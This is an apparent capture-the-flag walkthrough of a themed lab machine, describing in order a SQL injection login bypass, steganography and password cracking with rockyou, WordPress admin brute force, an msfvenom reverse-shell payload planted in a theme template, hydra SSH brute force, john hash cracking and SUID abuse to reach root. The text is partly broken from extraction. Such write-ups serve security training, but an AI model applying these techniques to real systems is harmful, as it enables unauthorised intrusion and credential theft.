Let's start with finding the IP address of the machine

The ip address of the host system was found to be
Scanning with nmap for open ports
• Nmap –sC –Pn
After getting the IP address of the machine I enumerated
the open ports using nmap tool, and found three services


After enumeration I found that 'anonymous' ftp login is

2. allowed,so I logged in to ftp
After downloading the todo.txt in the ftp server.It turned out to be a Honeypot. And there is no use of the ftp

Then I moved on to the http service, but couldn't find anything useful.So I brute forced the directories using dirb
I was able to find the robots.txt file which contained the disallowed directory entry which
contained a webpage named 's0mething.php'

After browsing the 's0mething.php' I got a login page

I decided to do a sql injection attack to bypass the login page

I used ' or'1'='1 sql syntax which leads the query to true.
And it worked
After looking at the source code of the page I found an encode text

From further investigation I found that it is a base85 encoded text and by using 'cyberchef' tool I decoded the
data and got 'b3lla-c1a0'. But I couldn't find what it was for.
Then I browsed 'b3lla-c1a0' in the browser and got a page which included a pdf file named 'money.pdf'

• Http://
Looking at the file properties I came to know that it is a jpg file and renamed it to money.jpg.
And using the stegcracker tool I brute forced the jpg file with Rockyou.txt and obtained the password as
• Stegcracker money.jpg /usr/share/wordlists/rockyou.txt

I got another jpg file named Heist.jpg and by further investigation I found a word in the jpg
file "la-c45a-d3-p4p3l"
• Strings heist.jpg
After browsing the word in the browser I got an unusual error displaying the domain name of the host(redteam). So
I knew I had to add the hostname in /etc/hosts
• Nano /etc/hosts
• Add " redteam"

After adding the hostname I reloaded the page and I was redirected to a wordpress page,on the bottom
of the page was a link to the login page and after clicking the link I got a wordpress login page
What I did next was, I tried to login with the defualt credentials. That is admin:admin

From this I came to know that a user 'admin' exists and we just have to find the password.
To brute force the password I used wpscan tool and the selected wordlist was rockyou.txt
The password was found to be 'admin123'
I logged in using the credentials and entered the wordpress management site
There are several ways to exploit a wordpress site.

What I did was uploaded a reverse tcp connection payload which

was created using msfvenom and copied in the 404 template in
the theme editor

Now that I've upoaded the shell, I have to setup a listener in metasploit and browse http://redteam/la-c45a-d3-

Thus I was able to get a shell as 'www-data' into the host system
As the user www-data does not have the necessary

4.PRIVILEGE privileges I have to escalate the privileges .

By looking at the home directory I came to know that the
ESCALATION user 'profess0r' is the superuser which has root access
After obtaining a shell of the user www-data I entered the home directory and found 3 users named profess0r,
ri0 & t0kyo

To obtain the password of the user t0kyo I created a dictionary

using 'cupp' tool
Next I brute forced the ssh service using hydra with this wordlist
• Hydra -l t0kyo –P silene.txt ssh://

Using hydra I got the password "tokyosilene" for the user 't0kyo'
Next I logged in to the ssh using this credentials and was logged in
as 't0kyo'
In the t0kyo user directory I found 2 files named 'gift' and 'letter'.
Opening them gave me a clue to go to the next user, ri0

Opening gift showed a message from Rio to Tokyo and opening the file 'letter' gave me a
password hash
• Cat gift
• Cat letter

I saved the hash into a file and tried to crack the hash using 'john' tool and the selected
dictionary was Seclists
• John –wordlist=/usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords.txt rio.txt

The password was found to be '!!Estresado!!'

So I changed the user to ri0
• Su ri0

By enumerating the directories,I found a message from berlin

to Rio

From the message it was clear that the file 'thegiftofprofessor' conained something that
would get me to the superuser
On enumerating further I discovered the private ssh key file named
'thegiftofprofessor' in /usr/games/user
• Cat thegiftofprofessor

I copied the ssh key to another file 'sshkey'

5.GAINING With the private ssh key obtained I logged in to the
superuser 'profess0r'
With the key obtained I logged in
• Chmod 700 sshkey
• Ssh -i sshkey profess0r@

Then I enumerated the SUID bit permission set files

• Find / -perm –u=s –type f 2>/dev/null
The file named 'shell' in the home directory looked fishy. So I checked the properties of the
file and realised it is an executable file which could also run commands
• ./shell /bin/bash

Vola!! Root access acquired successfully

